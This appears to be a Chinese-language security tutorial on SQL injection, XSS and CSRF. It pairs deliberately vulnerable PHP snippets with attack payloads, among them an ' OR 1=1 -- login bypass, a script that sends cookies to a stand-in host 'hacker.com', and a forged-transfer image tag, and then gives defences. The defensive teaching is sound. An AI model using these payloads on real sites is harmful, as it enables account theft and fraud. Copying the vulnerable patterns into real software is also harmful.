一、引言：为什么你的系统总在"裸奔"？

最近某电商平台因SQL注入泄露230万用户数据，某社交APP因XSS漏洞导致用户账号批量被盗。这些触目惊心的案例背后，反映的是开发者对安全漏洞的系统性忽视。本文将以真实攻防案例为基础，一起了解最危险的三大漏洞攻防技巧。

二、SQL注入：数据库的"夺命剪刀刀"

1. 攻击案例：登录绕过实战

// 漏洞代码示例（PHP+MySQL）
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $sql);

攻击手法 ：

在用户名输入框填入 ' OR 1=1 --，密码随意输入，最终拼接的SQL语句变为：

SELECT * FROM users WHERE username='' OR 1=1 --' AND password='xxx'

成功绕过身份验证。

2. 防御方案：预编译+参数化查询

// Java防御示例（使用PreparedStatement）
String sql = "SELECT * FROM users WHERE username=? AND password=?";
PreparedStatement pstmt = connection.prepareStatement(sql);
pstmt.setString(1, username);
pstmt.setString(2, password);
ResultSet rs = pstmt.executeQuery();

防御矩阵 ：

• 强制使用ORM框架（如MyBatis Plus的#{}语法）
• 部署SQL防火墙（如SQLCheck）
• 定期自动化SQL注入扫描

三、XSS：前端战场的"幽灵攻击"

1. 攻击案例：会话劫持实战

// 漏洞代码示例（评论功能）
<div class="comment">
  <?php echo $_GET['content']; ?>
</div>

攻击手法 ：在URL参数中传入：

?content=<script>window.location='http://hacker.com?cookie='+document.cookie</script>

当其他用户访问该页面时，cookie会被自动发送到攻击者服务器。

2. 防御方案：输入过滤+输出转义

// 前端防御示例（React）
<div dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(content)}} />

// 后端防御示例（Java）
String safeContent = HtmlUtils.htmlEscape(userInput);

防御矩阵 ：

• 实施CSP策略：Content-Security-Policy: default-src 'self'
• 部署XSS过滤中间件
• 重要操作二次验证（如修改密码需短信验证）

四、CSRF：跨站请求的"傀儡戏法"

1. 攻击案例：恶意转账实战

<!-- 漏洞页面：转账表单 -->
<form action="/transfer" method="POST">
  金额：<input type="text" name="amount">
  目标账户：<input type="text" name="target">
  <input type="submit" value="转账">
</form>

攻击手法 ：攻击者构造恶意页面：

<img src="http://bank.com/transfer?amount=10000&target=hacker">

当已登录用户访问该页面时，自动发起转账请求。

2. 防御方案：Token验证+SameSite策略

// 生成CSRF Token（Spring Security示例）
CsrfToken token = (CsrfToken) request.getAttribute(CsrfToken.class.getName());
model.addAttribute("_csrf", token);

// 前端表单添加：
<input type="hidden" name="${_csrf.parameterName}" value="${_csrf.token}"/>

防御矩阵 ：

• 双重验证：Token + 验证码
• 设置Cookie属性：SameSite=Strict
• 重要操作增加二次确认步骤

五、大厂安全体系构建建议

• SDL开发流程 ：在需求阶段引入威胁建模
• 自动化防御 ：
• 代码扫描：SonarQube + 自定义规则
• 运行时防护：RASP技术实时阻断攻击
• 红蓝对抗 ：每月组织攻防演练

六、结语：安全是1，其他是0

在真实系统某次内部渗透测试中，我们通过组合利用XSS和CSRF漏洞，成功获取了内网管理权限。这提醒我们：漏洞从来不是孤立存在，只有建立纵深防御体系，才能真正构建安全护城河。